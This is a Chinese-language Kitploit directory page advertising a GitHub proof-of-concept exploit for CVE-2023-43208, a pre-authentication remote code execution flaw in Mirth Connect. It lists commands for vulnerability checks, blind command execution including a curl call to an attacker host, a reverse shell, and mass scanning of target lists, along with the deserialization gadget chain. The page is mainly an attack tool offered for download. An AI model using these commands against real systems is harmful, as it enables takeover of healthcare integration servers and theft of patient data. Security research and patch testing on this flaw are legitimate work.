Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-43208 — CVE-2023-43208: Mirth Connect 预认证 RCE PoC | Kitploit
工具/GitHubGitHub/kyakei/cve-2023-43208
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: Mirth Connect 预认证 RCE PoC

查看仓库
3116个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-43208 — Mirth Connect 预认证远程代码执行

在 NextGen Healthcare Mirth Connect < 4.4.1 中通过 XStream 反序列化绕过实现预认证远程代码执行。

CVSS 9.8(严重) — CVE-2023-37679 的补丁绕过

概述

Mirth Connect 在 /api/users 端点上使用 Java XStream 库反序列化 XML 负载,无需身份验证。原始修复(CVE-2023-37679)引入了一个危险类黑名单,但通过使用 Apache Commons Lang3 中的 EventBindingInvocationHandler 结合 Commons Collections4 的 InvokerTransformer 链绕过了该黑名单。

在 Mirth Connect 4.4.1 中通过从黑名单切换为白名单修复。

依赖

root@kitploit:~
pip install requests

Python 3.10+(使用 match 语句)。

使用方法

检查目标是否存在漏洞

root@kitploit:~
python3 exploit.py check -t https://target:8443

执行命令(盲RCE — 无输出)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

获取反弹 Shell

root@kitploit:~
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

扫描多个目标

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

攻击链

root@kitploit:~
POST /api/users  (no auth)
     │
     ▼
XStream deserializes XML payload
     │
     ▼
sorted-set triggers Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (bypasses denylist)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      OS command execution as Mirth Connect service user

免责声明

此工具仅供授权安全测试和教育目的使用。未经授权访问计算机系统是违法的。测试前务必获得适当授权。

参考资料

  • NVD — CVE-2023-43208
  • Horizon3.ai — 分析文章
  • CISA KEV 目录
下载工具